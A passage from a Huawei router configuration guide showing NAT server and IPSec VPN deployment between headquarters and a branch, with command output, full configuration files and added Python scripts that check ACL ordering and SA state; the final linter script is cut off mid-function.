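    a, b, w = (int(IPv4Address(x)) for x in (addr, base, wildcard))
    return (a | w) == (b | w)


@dataclass(frozen=True)
class Rule:
    number: int
    action: str                       # "permit" or "deny"
    src: str
    src_wild: str
    dst: str = "0.0.0.0"              # default: any destination
    dst_wild: str = "255.255.255.255"

    def matches(self, src: str, dst: str) -> bool:
        return (_wild_match(src, self.src, self.src_wild)
                and _wild_match(dst, self.dst, self.dst_wild))


class Acl:
    """An advanced ACL: rules are tried in ascending rule-number order."""

    def __init__(self, number: int, rules: List[Rule]):
        self.number = number
        self.rules = sorted(rules, key=lambda r: r.number)

    def lookup(self, src: str, dst: str) -> Optional[str]:
        for rule in self.rules:
            if rule.matches(src, dst):
                return rule.action
        return None                   # no rule matched


# ACL 3000 on RouterA as configured in Step 5.1
NAT_ACL = Acl(3000, [
    Rule(5, "deny", "10.10.10.0", "0.0.0.255", "10.10.200.0", "0.0.0.255"),
    Rule(10, "deny", "10.10.20.0", "0.0.0.255", "10.10.200.0", "0.0.0.255"),
    Rule(15, "permit", "10.10.10.0", "0.0.0.255"),
])

# ACL 3001 on RouterA as configured in Step 7.1
IPSEC_ACL = Acl(3001, [
    Rule(5, "permit", "10.10.10.0", "0.0.0.255", "10.10.200.0", "0.0.0.255"),
    Rule(10, "permit", "10.10.20.0", "0.0.0.255", "10.10.200.0", "0.0.0.255"),
])


def egress_action(src: str, dst: str, nat_acl: Acl = NAT_ACL,
                  ipsec_acl: Acl = IPSEC_ACL) -> str:
    """What GE1/0/0 does with a packet leaving the campus.

    "nat"   - source translated (Easy IP) and sent to the Internet
    "ipsec" - left untranslated and encrypted towards the branch
    "plain" - forwarded untranslated and unencrypted; a private source
              address gets no further on the Internet (Department B case)
    """
    if nat_acl.lookup(src, dst) == "permit":
        return "nat"                  # NAT runs first, so a permit wins here
    if ipsec_acl.lookup(src, dst) == "permit":
        return "ipsec"
    return "plain"


def audit(nat_acl: Acl, ipsec_acl: Acl) -> List[Tuple[str, str]]:
    """Flag IPSec-protected flows that the NAT ACL would translate first.

    Such a flow reaches the IPSec policy with a public source address, no
    longer matches the IPSec ACL, and leaves for the Internet in the clear.
    Each protected pair is probed with its first host address.
    """
    leaks = []
    for rule in ipsec_acl.rules:
        if rule.action != "permit":
            continue
        src = str(IPv4Address(rule.src) + 1)
        dst = str(IPv4Address(rule.dst) + 1)
        if nat_acl.lookup(src, dst) == "permit":
            leaks.append((src, dst))
    return leaks


if __name__ == "__main__":
    # constructed sample flows; 198.51.100.10 stands in for an Internet host
    for flow in [("10.10.10.2", "198.51.100.10"), ("10.10.20.2", "198.51.100.10"),
                 ("10.10.10.2", "10.10.200.2"), ("10.10.20.2", "10.10.200.2")]:
        print(flow, "->", egress_action(*flow))
    print("audit of ACL 3000 vs ACL 3001:", audit(NAT_ACL, IPSEC_ACL))
```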

Step 6 Deploy a NAT server.

The headquarters has a web server. You need to configure a NAT server on the two egress
routers (RouterA and RouterB) to allow external users to access the internal web server.

# Configure RouterA.
[RouterA] interface GigabitEthernet1/0/0
[RouterA-GigabitEthernet1/0/0] nat server protocol tcp global 202.10.100.3 www inside 10.10.30.2 8080
[RouterA-GigabitEthernet1/0/0] quit

# Configure RouterB.
[RouterB] interface GigabitEthernet1/0/0
[RouterB-GigabitEthernet1/0/0] nat server protocol tcp global 202.10.100.3 www inside 10.10.30.2 8080
[RouterB-GigabitEthernet1/0/0] quit

# After the configuration is complete, run the display nat server command to view NAT
server configuration. The following uses the display on RouterA as an example.
[RouterA] display nat server

Nat Server Information:


Interface : GigabitEthernet1/0/0
Global IP/Port : 202.10.100.3/80(www)
Inside IP/Port : 10.10.30.2/8080
Protocol : 6(tcp)
VPN instance-name : ----
Acl number : ----
Description : ----

Total : 1

Step 7 Deploy IPSec VPN so that the headquarters and branch can communicate through the VPN
over the Internet and data communication can be protected.
1. Configure ACLs to permit the data flows to be protected by IPSec.
# Configure RouterA (egress router) of the headquarters.
[RouterA] acl 3001
[RouterA-acl-adv-3001] rule 5 permit ip source 10.10.10.0 0.0.0.255 destination 10.10.200.0 0.0.0.255 //Configure an ACL to permit the data flow to be protected by IPSec.
[RouterA-acl-adv-3001] rule 10 permit ip source 10.10.20.0 0.0.0.255 destination 10.10.200.0 0.0.0.255 //Configure an ACL to permit the data flow to be protected by IPSec.
[RouterA-acl-adv-3001] quit

# Configure RouterB (egress router) of the headquarters.


[RouterB] acl 3001
[RouterB-acl-adv-3001] rule 5 permit ip source 10.10.10.0 0.0.0.255 destination 10.10.200.0 0.0.0.255
[RouterB-acl-adv-3001] rule 10 permit ip source 10.10.20.0 0.0.0.255 destination 10.10.200.0 0.0.0.255
[RouterB-acl-adv-3001] quit

# Configure RouterC (egress router) of the branch.


[RouterC] acl 3001
[RouterC-acl-adv-3001] rule 5 permit ip source 10.10.200.0 0.0.0.255 destination 10.10.10.0 0.0.0.255
[RouterC-acl-adv-3001] rule 10 permit ip source 10.10.200.0 0.0.0.255 destination 10.10.20.0 0.0.0.255
[RouterC-acl-adv-3001] quit

2. Configure an IPSec proposal.


# Configure RouterA (egress router) of the headquarters. The configurations of RouterB
and RouterC are similar to that of RouterA.
[RouterA] ipsec proposal tran1
[RouterA-ipsec-proposal-tran1] esp authentication-algorithm sha2-256 //Configure the authentication algorithm used by ESP.
[RouterA-ipsec-proposal-tran1] esp encryption-algorithm aes-128 //Configure the encryption algorithm used by ESP.
[RouterA-ipsec-proposal-tran1] quit

3. Configure an IKE proposal.


# Configure RouterA (egress router) of the headquarters. The configurations of RouterB
and RouterC are similar to that of RouterA.
[RouterA] ike proposal 5
[RouterA-ike-proposal-5] encryption-algorithm aes-cbc-128
[RouterA-ike-proposal-5] quit

4. Configure an IKE peer.


# Configure RouterA (egress router) of the headquarters.
[RouterA] ike peer vpn v1
[RouterA-ike-peer-vpn] pre-shared-key cipher huawei123
[RouterA-ike-peer-vpn] ike-proposal 5
[RouterA-ike-peer-vpn] dpd type periodic //Configure periodic dead peer detection (DPD).
[RouterA-ike-peer-vpn] dpd idle-time 10 //Set the DPD idle time to 10 seconds.
[RouterA-ike-peer-vpn] remote-address 203.10.1.2
[RouterA-ike-peer-vpn] quit


# Configure RouterB (egress router) of the headquarters.


[RouterB] ike peer vpn v1
[RouterB-ike-peer-vpn] pre-shared-key cipher huawei123
[RouterB-ike-peer-vpn] ike-proposal 5
[RouterB-ike-peer-vpn] dpd type periodic
[RouterB-ike-peer-vpn] dpd idle-time 10
[RouterB-ike-peer-vpn] remote-address 203.10.1.2
[RouterB-ike-peer-vpn] quit

# Configure RouterC (egress router) of the branch.


[RouterC] ike peer vpnr1 v1
[RouterC-ike-peer-vpnr1] pre-shared-key cipher huawei123
[RouterC-ike-peer-vpnr1] ike-proposal 5
[RouterC-ike-peer-vpnr1] dpd type periodic
[RouterC-ike-peer-vpnr1] dpd idle-time 10
[RouterC-ike-peer-vpnr1] remote-address 202.10.1.2
[RouterC-ike-peer-vpnr1] quit
[RouterC] ike peer vpnr2 v1
[RouterC-ike-peer-vpnr2] pre-shared-key cipher huawei123
[RouterC-ike-peer-vpnr2] ike-proposal 5
[RouterC-ike-peer-vpnr2] dpd type periodic
[RouterC-ike-peer-vpnr2] dpd idle-time 10
[RouterC-ike-peer-vpnr2] remote-address 202.10.2.2
[RouterC-ike-peer-vpnr2] quit

5. Configure a security policy.

# Configure RouterA (egress router) of the headquarters.
[RouterA] ipsec policy ipsec_vpn 10 isakmp
[RouterA-ipsec-policy-isakmp-ipsec_vpn-10] security acl 3001
[RouterA-ipsec-policy-isakmp-ipsec_vpn-10] ike-peer vpn
[RouterA-ipsec-policy-isakmp-ipsec_vpn-10] proposal tran1
[RouterA-ipsec-policy-isakmp-ipsec_vpn-10] quit

# Configure RouterB (egress router) of the headquarters.
[RouterB] ipsec policy ipsec_vpn 10 isakmp
[RouterB-ipsec-policy-isakmp-ipsec_vpn-10] security acl 3001
[RouterB-ipsec-policy-isakmp-ipsec_vpn-10] ike-peer vpn
[RouterB-ipsec-policy-isakmp-ipsec_vpn-10] proposal tran1
[RouterB-ipsec-policy-isakmp-ipsec_vpn-10] quit

# Configure RouterC (egress router) of the branch.
[RouterC] ipsec policy ipsec_vpn 10 isakmp
[RouterC-ipsec-policy-isakmp-ipsec_vpn-10] security acl 3001
[RouterC-ipsec-policy-isakmp-ipsec_vpn-10] ike-peer vpnr1
[RouterC-ipsec-policy-isakmp-ipsec_vpn-10] proposal tran1
[RouterC-ipsec-policy-isakmp-ipsec_vpn-10] quit
[RouterC] ipsec policy ipsec_vpn 20 isakmp
[RouterC-ipsec-policy-isakmp-ipsec_vpn-20] security acl 3001
[RouterC-ipsec-policy-isakmp-ipsec_vpn-20] ike-peer vpnr2
[RouterC-ipsec-policy-isakmp-ipsec_vpn-20] proposal tran1
[RouterC-ipsec-policy-isakmp-ipsec_vpn-20] quit

6. Apply an IPSec policy group to an interface.

# Apply an IPSec policy group to GE1/0/0 that connects RouterA to RouterD.
[RouterA] interface GigabitEthernet1/0/0
[RouterA-GigabitEthernet1/0/0] ipsec policy ipsec_vpn
[RouterA-GigabitEthernet1/0/0] quit

# Apply an IPSec policy group to GE1/0/0 that connects RouterB to RouterD.
[RouterB] interface GigabitEthernet1/0/0
[RouterB-GigabitEthernet1/0/0] ipsec policy ipsec_vpn
[RouterB-GigabitEthernet1/0/0] quit

# Apply an IPSec policy group to GE1/0/0 that connects RouterC to RouterD.
[RouterC] interface GigabitEthernet1/0/0
[RouterC-GigabitEthernet1/0/0] ipsec policy ipsec_vpn
[RouterC-GigabitEthernet1/0/0] quit

7. Verify the configuration.

# After the configuration is complete, run the display ike sa command to view information about the security association (SA) established through IKE negotiation.
[RouterC] display ike sa
Conn-ID Peer VPN Flag(s) Phase
---------------------------------------------------------------
7 202.10.2.2 0 RD|ST 2
4 202.10.2.2 0 RD 2
2 202.10.2.2 0 RD 1
6 202.10.1.2 0 RD|ST 2
5 202.10.1.2 0 RD 2
3 202.10.1.2 0 RD 1

Flag Description:
RD--READY ST--STAYALIVE RL--REPLACED FD--FADING TO--TIMEOUT
HRT--HEARTBEAT LKG--LAST KNOWN GOOD SEQ NO. BCK--BACKED UP

# After the configuration is complete, run the display ipsec sa command to view SA
information. The following uses the display on RouterC as an example.
[RouterC] display ipsec sa

===============================
Interface: GigabitEthernet1/0/0
Path MTU: 1500
===============================

-----------------------------
IPSec policy name: "ipsec_vpn"
Sequence number : 10
Acl Group : 3001
Acl rule : 5
Mode : ISAKMP
-----------------------------
Connection ID : 5
Encapsulation mode: Tunnel
Tunnel local : 203.10.1.2
Tunnel remote : 202.10.1.2
Flow source : 10.10.200.0/255.255.255.0 0/0
Flow destination : 10.10.10.0/255.255.255.0 0/0
Qos pre-classify : Disable

[Outbound ESP SAs]


SPI: 969156085 (0x39c425f5)
Proposal: ESP-ENCRYPT-AES-128 SHA2-256-128
SA remaining key duration (bytes/sec): 1887313920/1521
Max sent sequence-number: 8
UDP encapsulation used for NAT traversal: N

[Inbound ESP SAs]


SPI: 1258341975 (0x4b00c657)
Proposal: ESP-ENCRYPT-AES-128 SHA2-256-128
SA remaining key duration (bytes/sec): 1887436080/1521
Max received sequence-number: 10
Anti-replay window size: 32
UDP encapsulation used for NAT traversal: N

-----------------------------
IPSec policy name: "ipsec_vpn"
Sequence number : 10
Acl Group : 3001
Acl rule : 10
Mode : ISAKMP
-----------------------------
Connection ID : 6
Encapsulation mode: Tunnel
Tunnel local : 203.10.1.2
Tunnel remote : 202.10.1.2
Flow source : 10.10.200.0/255.255.255.0 0/0
Flow destination : 10.10.20.0/255.255.255.0 0/0
Qos pre-classify : Disable

[Outbound ESP SAs]


SPI: 4217384908 (0xfb602fcc)
Proposal: ESP-ENCRYPT-AES-128 SHA2-256-128
SA remaining key duration (bytes/sec): 1887283200/1522
Max sent sequence-number: 10
UDP encapsulation used for NAT traversal: N

[Inbound ESP SAs]


SPI: 654720480 (0x27063de0)
Proposal: ESP-ENCRYPT-AES-128 SHA2-256-128
SA remaining key duration (bytes/sec): 1887436080/1522
Max received sequence-number: 10
Anti-replay window size: 32
UDP encapsulation used for NAT traversal: N

-----------------------------
IPSec policy name: "ipsec_vpn"
Sequence number : 20
Acl Group : 3001
Acl rule : 5
Mode : ISAKMP
-----------------------------
Connection ID : 4
Encapsulation mode: Tunnel
Tunnel local : 203.10.1.2
Tunnel remote : 202.10.2.2
Flow source : 10.10.200.0/255.255.255.0 0/0
Flow destination : 10.10.10.0/255.255.255.0 0/0
Qos pre-classify : Disable

[Outbound ESP SAs]


SPI: 240759500 (0xe59b2cc)
Proposal: ESP-ENCRYPT-AES-128 SHA2-256-128
SA remaining key duration (bytes/sec): 1887436800/1521
Max sent sequence-number: 0
UDP encapsulation used for NAT traversal: N

[Inbound ESP SAs]


SPI: 3888073495 (0xe7bf4b17)
Proposal: ESP-ENCRYPT-AES-128 SHA2-256-128
SA remaining key duration (bytes/sec): 1887436800/1521
Max received sequence-number: 0
Anti-replay window size: 32
UDP encapsulation used for NAT traversal: N

-----------------------------
IPSec policy name: "ipsec_vpn"
Sequence number : 20
Acl Group : 3001
Acl rule : 10
Mode : ISAKMP
-----------------------------
Connection ID : 7
Encapsulation mode: Tunnel
Tunnel local : 203.10.1.2
Tunnel remote : 202.10.2.2
Flow source : 10.10.200.0/255.255.255.0 0/0
Flow destination : 10.10.20.0/255.255.255.0 0/0
Qos pre-classify : Disable

[Outbound ESP SAs]


SPI: 2751917383 (0xa406ed47)
Proposal: ESP-ENCRYPT-AES-128 SHA2-256-128
SA remaining key duration (bytes/sec): 1887436800/1522
Max sent sequence-number: 0
UDP encapsulation used for NAT traversal: N

[Inbound ESP SAs]


SPI: 739146604 (0x2c0e7b6c)
Proposal: ESP-ENCRYPT-AES-128 SHA2-256-128
SA remaining key duration (bytes/sec): 1887436800/1522
Max received sequence-number: 0
Anti-replay window size: 32
UDP encapsulation used for NAT traversal: N
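The two outputs above can be checked by a script rather than by eye. The following Python example is added here and is not part of the Huawei document: it parses the text of display ike sa and display ipsec sa (the constructed samples are copied from the RouterC output shown above, trimmed to the fields the check reads) and reports a planned peer (RouterA 202.10.1.2 and RouterB 202.10.2.2, as seen from RouterC) that has no READY phase 1 or phase 2 SA, an SA whose proposal is not the AES-128 with SHA2-256 combination that proposal tran1 configures, and an inbound SA without an anti-replay window. The peer list, the proposal string and the function names are the example's own.

```python
"""Check IKE/IPsec SA state from Huawei VRP display output (added example,
not from the Huawei document): flags planned peers without a READY SA and
IPsec SAs whose algorithms or anti-replay state differ from the plan."""
import re

# Constructed sample: the RouterC 'display ike sa' output shown on the page.
IKE_SA_OUTPUT = """\
Conn-ID Peer VPN Flag(s) Phase
---------------------------------------------------------------
7 202.10.2.2 0 RD|ST 2
4 202.10.2.2 0 RD 2
2 202.10.2.2 0 RD 1
6 202.10.1.2 0 RD|ST 2
5 202.10.1.2 0 RD 2
3 202.10.1.2 0 RD 1

Flag Description:
RD--READY ST--STAYALIVE RL--REPLACED FD--FADING TO--TIMEOUT
"""

# Constructed sample: two of the four 'display ipsec sa' entries from the
# page, trimmed to the fields the check reads.
IPSEC_SA_OUTPUT = """\
IPSec policy name: "ipsec_vpn"
Sequence number : 10
Tunnel remote : 202.10.1.2
[Outbound ESP SAs]
Proposal: ESP-ENCRYPT-AES-128 SHA2-256-128
[Inbound ESP SAs]
Proposal: ESP-ENCRYPT-AES-128 SHA2-256-128
Anti-replay window size: 32
IPSec policy name: "ipsec_vpn"
Sequence number : 20
Tunnel remote : 202.10.2.2
[Outbound ESP SAs]
Proposal: ESP-ENCRYPT-AES-128 SHA2-256-128
[Inbound ESP SAs]
Proposal: ESP-ENCRYPT-AES-128 SHA2-256-128
Anti-replay window size: 32
"""

PLANNED_PEERS = ["202.10.1.2", "202.10.2.2"]          # RouterA and RouterB, seen from RouterC
PLANNED_PROPOSAL = "ESP-ENCRYPT-AES-128 SHA2-256-128"  # what proposal tran1 negotiates
IKE_ROW = re.compile(r"^\s*(\d+)\s+(\S+)\s+(\d+)\s+(\S+)\s+([12])\s*$")


def parse_ike_sa(text):
    """Return (peer, flag set, phase) for each SA row of 'display ike sa'."""
    rows = []
    for line in text.splitlines():
        m = IKE_ROW.match(line)
        if m:
            rows.append((m.group(2), set(m.group(4).split("|")), int(m.group(5))))
    return rows


def check_ike_peers(text, expected_peers):
    """List planned peers that have no READY (RD) phase 1 or phase 2 SA."""
    rows = parse_ike_sa(text)
    problems = []
    for peer in expected_peers:
        for phase in (1, 2):
            if not any(p == peer and ph == phase and "RD" in flags for p, flags, ph in rows):
                problems.append(f"{peer}: no READY phase {phase} SA")
    return problems


def parse_ipsec_sa(text):
    """Return one dict per policy entry of 'display ipsec sa' with its ESP SAs."""
    entries, cur, direction = [], None, None
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("IPSec policy name:"):
            cur = {"policy": line.split(":", 1)[1].strip().strip('"'), "sas": {}}
            entries.append(cur)
            direction = None
        elif cur is None:
            continue
        elif line.startswith("Sequence number"):
            cur["seq"] = int(line.split(":", 1)[1])
        elif line.startswith("Tunnel remote"):
            cur["remote"] = line.split(":", 1)[1].strip()
        elif line in ("[Outbound ESP SAs]", "[Inbound ESP SAs]"):
            direction = line[1:].split()[0].lower()   # "outbound" or "inbound"
            cur["sas"][direction] = {}
        elif direction and line.startswith("Proposal:"):
            cur["sas"][direction]["proposal"] = line.split(":", 1)[1].strip()
        elif direction and line.startswith("Anti-replay window size:"):
            cur["sas"][direction]["anti_replay"] = int(line.split(":", 1)[1])
    return entries


def check_ipsec_sas(text, expected_peers, expected_proposal=PLANNED_PROPOSAL):
    """List SAs to unplanned peers, with unplanned algorithms, or without anti-replay."""
    problems = []
    for e in parse_ipsec_sa(text):
        tag = f"{e['policy']} seq {e.get('seq')}"
        if e.get("remote") not in expected_peers:
            problems.append(f"{tag}: unplanned tunnel remote {e.get('remote')}")
        for d in ("outbound", "inbound"):
            sa = e["sas"].get(d)
            if sa is None:
                problems.append(f"{tag}: no {d} SA")
            elif sa.get("proposal") != expected_proposal:
                problems.append(f"{tag}: {d} proposal is {sa.get('proposal')}")
        if e["sas"].get("inbound", {}).get("anti_replay", 0) <= 0:
            problems.append(f"{tag}: anti-replay window not active on inbound SA")
    return problems
```

Both checks return an empty list for the RouterC output above; feeding them the output of a peer whose proposal was changed, or of a router that only completed phase 1, produces one finding per deviation, which is what an operator would want to see after a change window.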

Step 8 Verify the configuration.

# Run the ping command to test the connectivity between the headquarters and branch.
PC1>ping 10.10.200.2

Ping 10.10.200.2: 32 data bytes, Press Ctrl_C to break


From 10.10.200.2: bytes=32 seq=1 ttl=126 time=140 ms
From 10.10.200.2: bytes=32 seq=2 ttl=126 time=235 ms
From 10.10.200.2: bytes=32 seq=3 ttl=126 time=266 ms
From 10.10.200.2: bytes=32 seq=4 ttl=126 time=140 ms
From 10.10.200.2: bytes=32 seq=5 ttl=126 time=141 ms

--- 10.10.200.2 ping statistics ---


5 packet(s) transmitted
5 packet(s) received
0.00% packet loss
round-trip min/avg/max = 140/184/266 ms
PC3>ping 10.10.200.2

Ping 10.10.200.2: 32 data bytes, Press Ctrl_C to break


From 10.10.200.2: bytes=32 seq=1 ttl=126 time=156 ms
From 10.10.200.2: bytes=32 seq=2 ttl=126 time=297 ms
From 10.10.200.2: bytes=32 seq=3 ttl=126 time=156 ms
From 10.10.200.2: bytes=32 seq=4 ttl=126 time=141 ms
From 10.10.200.2: bytes=32 seq=5 ttl=126 time=109 ms

--- 10.10.200.2 ping statistics ---


5 packet(s) transmitted
5 packet(s) received
0.00% packet loss
round-trip min/avg/max = 109/171/297 ms

The preceding command output shows that PC1 and PC5, and PC3 and PC5 can communicate
with each other, and the headquarters and branch can communicate through the VPN over the
Internet.

# Verify the connectivity between departments of the headquarters and the Internet. In the
following example, ping the public network gateway 202.10.1.1 of the headquarters from PC1
and PC3.
PC1>ping 202.10.1.1

Ping 202.10.1.1: 32 data bytes, Press Ctrl_C to break


From 202.10.1.1: bytes=32 seq=1 ttl=253 time=235 ms
From 202.10.1.1: bytes=32 seq=2 ttl=253 time=109 ms
From 202.10.1.1: bytes=32 seq=3 ttl=253 time=79 ms
From 202.10.1.1: bytes=32 seq=4 ttl=253 time=63 ms
From 202.10.1.1: bytes=32 seq=5 ttl=253 time=63 ms

--- 202.10.1.1 ping statistics ---


5 packet(s) transmitted
5 packet(s) received
0.00% packet loss
round-trip min/avg/max = 63/109/235 ms
PC3>ping 202.10.1.1

Ping 202.10.1.1: 32 data bytes, Press Ctrl_C to break


Request timeout!
Request timeout!
Request timeout!
Request timeout!
Request timeout!

--- 202.10.1.1 ping statistics ---


5 packet(s) transmitted
0 packet(s) received
100.00% packet loss

The preceding command output shows that users (such as PC1) in Department A can access
the public network but users (such as PC3) in Department B cannot.

----End

Configuration Files
l Core switch configuration file
#
sysname CORE
#
vlan batch 100
#
interface Vlanif100
ip address 10.10.100.4 255.255.255.0
#
interface Eth-Trunk3
port link-type trunk
port trunk allow-pass vlan 100
mode lacp
#
interface Eth-Trunk4
port link-type trunk
port trunk allow-pass vlan 100
mode lacp
#
interface GigabitEthernet0/0/3
eth-trunk 3
#
interface GigabitEthernet0/0/4
eth-trunk 4
#
interface GigabitEthernet1/0/3
eth-trunk 3
#
interface GigabitEthernet1/0/4
eth-trunk 4
#
ospf 1 router-id 10.3.3.3
area 0.0.0.0
network 10.10.100.0 0.0.0.255
network 10.10.10.0 0.0.0.255
network 10.10.20.0 0.0.0.255
network 10.10.30.0 0.0.0.255
#
ip route-static 0.0.0.0 0.0.0.0 10.10.100.1
#
return

l RouterA configuration file
#
sysname RouterA
#
acl number 3000
rule 5 deny ip source 10.10.10.0 0.0.0.255 destination 10.10.200.0 0.0.0.255
rule 10 deny ip source 10.10.20.0 0.0.0.255 destination 10.10.200.0 0.0.0.255
rule 15 permit ip source 10.10.10.0 0.0.0.255
acl number 3001
rule 5 permit ip source 10.10.10.0 0.0.0.255 destination 10.10.200.0 0.0.0.255
rule 10 permit ip source 10.10.20.0 0.0.0.255 destination 10.10.200.0 0.0.0.255
#
ipsec proposal tran1
esp authentication-algorithm sha2-256
esp encryption-algorithm aes-128
#
ike proposal 5
encryption-algorithm aes-cbc-128
#
ike peer vpn v1
pre-shared-key cipher "@J*U2S*(7F,YWX*NZ55OA!!
ike-proposal 5
dpd type periodic
dpd idle-time 10
remote-address 203.10.1.2
#
ipsec policy ipsec_vpn 10 isakmp
security acl 3001
ike-peer vpn
proposal tran1
#
interface Eth-Trunk1
undo portswitch
mode lacp-static
#
interface Eth-Trunk1.100
dot1q termination vid 100
ip address 10.10.100.2 255.255.255.0
vrrp vrid 1 virtual-ip 10.10.100.1
vrrp vrid 1 priority 120
vrrp vrid 1 track interface GigabitEthernet1/0/0 reduced 40
arp broadcast enable
#
interface GigabitEthernet1/0/0
ip address 202.10.1.2 255.255.255.0
ipsec policy ipsec_vpn
nat server protocol tcp global 202.10.100.3 www inside 10.10.30.2 8080
nat outbound 3000
#
interface GigabitEthernet2/0/0
eth-trunk 1
#
interface GigabitEthernet2/0/1
eth-trunk 1
#
ospf 1 router-id 10.1.1.1
area 0.0.0.0
network 10.10.100.0 0.0.0.255
#
ip route-static 0.0.0.0 0.0.0.0 202.10.1.1
#
return

l RouterB configuration file
#
sysname RouterB
#
acl number 3000
rule 5 deny ip source 10.10.10.0 0.0.0.255 destination 10.10.200.0 0.0.0.255
rule 10 deny ip source 10.10.20.0 0.0.0.255 destination 10.10.200.0 0.0.0.255
rule 15 permit ip source 10.10.10.0 0.0.0.255
acl number 3001
rule 5 permit ip source 10.10.10.0 0.0.0.255 destination 10.10.200.0 0.0.0.255
rule 10 permit ip source 10.10.20.0 0.0.0.255 destination 10.10.200.0 0.0.0.255
#
ipsec proposal tran1
esp authentication-algorithm sha2-256
esp encryption-algorithm aes-128
#
ike proposal 5
encryption-algorithm aes-cbc-128
#
ike peer vpn v1
pre-shared-key cipher "@J*U2S*(7F,YWX*NZ55OA!!
ike-proposal 5
dpd type periodic
dpd idle-time 10
remote-address 203.10.1.2
#
ipsec policy ipsec_vpn 10 isakmp
security acl 3001
ike-peer vpn
proposal tran1
#
interface Eth-Trunk1
undo portswitch
mode lacp-static
#
interface Eth-Trunk1.100
dot1q termination vid 100
ip address 10.10.100.3 255.255.255.0
vrrp vrid 1 virtual-ip 10.10.100.1
arp broadcast enable
#
interface GigabitEthernet1/0/0
ip address 202.10.2.2 255.255.255.0
ipsec policy ipsec_vpn
nat server protocol tcp global 202.10.100.3 www inside 10.10.30.2 8080
nat outbound 3000
#
interface GigabitEthernet2/0/0
eth-trunk 1
#
interface GigabitEthernet2/0/1
eth-trunk 1
#
ospf 1 router-id 10.2.2.2
area 0.0.0.0
network 10.10.100.0 0.0.0.255
#
ip route-static 0.0.0.0 0.0.0.0 202.10.2.1
#
return

l Configuration file of the branch egress router RouterC
#
sysname RouterC
#
acl number 3000
rule 5 deny ip source 10.10.200.0 0.0.0.255 destination 10.10.10.0 0.0.0.255
rule 10 deny ip source 10.10.200.0 0.0.0.255 destination 10.10.20.0 0.0.0.255
rule 15 permit ip source 10.10.200.0 0.0.0.255
acl number 3001
rule 5 permit ip source 10.10.200.0 0.0.0.255 destination 10.10.10.0 0.0.0.255
rule 10 permit ip source 10.10.200.0 0.0.0.255 destination 10.10.20.0 0.0.0.255
#
ipsec proposal tran1
esp authentication-algorithm sha2-256
esp encryption-algorithm aes-128
#
ike proposal 5
encryption-algorithm aes-cbc-128
#
ike peer vpnr1 v1
pre-shared-key cipher "@J*U2S*(7F,YWX*NZ55OA!!
ike-proposal 5
dpd type periodic
dpd idle-time 10
remote-address 202.10.1.2
#
ike peer vpnr2 v1
pre-shared-key cipher "@J*U2S*(7F,YWX*NZ55OA!!
ike-proposal 5
dpd type periodic
dpd idle-time 10
remote-address 202.10.2.2
#
ipsec policy ipsec_vpn 10 isakmp
security acl 3001
ike-peer vpnr1
proposal tran1
#
ipsec policy ipsec_vpn 20 isakmp
security acl 3001
ike-peer vpnr2
proposal tran1
#
interface GigabitEthernet1/0/0
ip address 203.10.1.2 255.255.255.0
ipsec policy ipsec_vpn
nat outbound 3000
#
ip route-static 0.0.0.0 0.0.0.0 203.10.1.1
#
return

l Configuration file of the headquarters carrier router RouterD
#
sysname RouterD
#
interface GigabitEthernet1/0/0
ip address 202.10.1.1 255.255.255.0
#
interface GigabitEthernet2/0/0
ip address 202.10.2.1 255.255.255.0
#
ip route-static 202.10.100.0 255.255.255.0 202.10.1.2 preference 40
ip route-static 202.10.100.0 255.255.255.0 202.10.2.2
#
return

l Configuration file of the branch carrier router RouterE
#
sysname RouterE
#
interface GigabitEthernet1/0/0
ip address 203.10.1.1 255.255.255.0
#
return
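One detail of the egress router files above that is worth checking mechanically is the split between the two ACLs on GigabitEthernet1/0/0: ACL 3000, used by nat outbound, denies the 10.10.10.0/24 and 10.10.20.0/24 to 10.10.200.0/24 flows before it permits 10.10.10.0/24, so headquarters-to-branch traffic is not translated before ACL 3001 selects it for encryption. The following Python linter is an added example and not part of the Huawei document: it runs over a constructed copy of the RouterA configuration file (the IKE proposal, VRRP and OSPF sections are left out because the check does not read them), reports any VPN flow that is not denied in the NAT ACL before that ACL's first permit rule, and also confirms that each ipsec policy references an ACL, an IKE peer and a proposal that are actually defined. The parser and the function names are the example's own.

```python
"""Lint the NAT/IPsec ACL split in a Huawei VRP configuration file (added
example, not part of the Huawei document)."""
import re

# Constructed sample modelled on the RouterA configuration file above.
ROUTER_A_CONFIG = """\
acl number 3000
 rule 5 deny ip source 10.10.10.0 0.0.0.255 destination 10.10.200.0 0.0.0.255
 rule 10 deny ip source 10.10.20.0 0.0.0.255 destination 10.10.200.0 0.0.0.255
 rule 15 permit ip source 10.10.10.0 0.0.0.255
acl number 3001
 rule 5 permit ip source 10.10.10.0 0.0.0.255 destination 10.10.200.0 0.0.0.255
 rule 10 permit ip source 10.10.20.0 0.0.0.255 destination 10.10.200.0 0.0.0.255
#
ipsec proposal tran1
 esp authentication-algorithm sha2-256
 esp encryption-algorithm aes-128
#
ike peer vpn v1
 remote-address 203.10.1.2
#
ipsec policy ipsec_vpn 10 isakmp
 security acl 3001
 ike-peer vpn
 proposal tran1
#
interface GigabitEthernet1/0/0
 ipsec policy ipsec_vpn
 nat outbound 3000
#
"""

RULE_RE = re.compile(r"rule (\d+) (permit|deny) ip"
                     r"(?: source (\S+ \S+))?(?: destination (\S+ \S+))?$")


def parse_config(text):
    """Extract ACL rules, proposal and peer names, ipsec policies and interface bindings."""
    cfg = {"acls": {}, "proposals": set(), "peers": set(), "policies": [], "interfaces": {}}
    ctx = None  # block the indented lines belong to: ("acl", n), ("policy", dict), ("iface", name)
    for raw in text.splitlines():
        parts = raw.split()
        if not parts:
            continue
        if parts == ["#"]:
            ctx = None
        elif parts[:2] == ["acl", "number"]:
            ctx = ("acl", int(parts[2]))
            cfg["acls"][ctx[1]] = []
        elif parts[:2] in (["ipsec", "proposal"], ["ike", "peer"]):
            cfg["proposals" if parts[0] == "ipsec" else "peers"].add(parts[2])
            ctx = None
        elif parts[:2] == ["ipsec", "policy"] and parts[-1] == "isakmp":
            pol = {"name": parts[2], "seq": int(parts[3])}
            cfg["policies"].append(pol)
            ctx = ("policy", pol)
        elif parts[0] == "interface":
            ctx = ("iface", parts[1])
            cfg["interfaces"][parts[1]] = {}
        elif ctx is None:
            continue
        elif ctx[0] == "acl":
            m = RULE_RE.match(raw.strip())
            if m:  # (rule number, action, source, destination); "any" when omitted
                cfg["acls"][ctx[1]].append((int(m.group(1)), m.group(2),
                                            m.group(3) or "any", m.group(4) or "any"))
        elif ctx[0] == "policy":
            if parts[:2] == ["security", "acl"]:
                ctx[1]["acl"] = int(parts[2])
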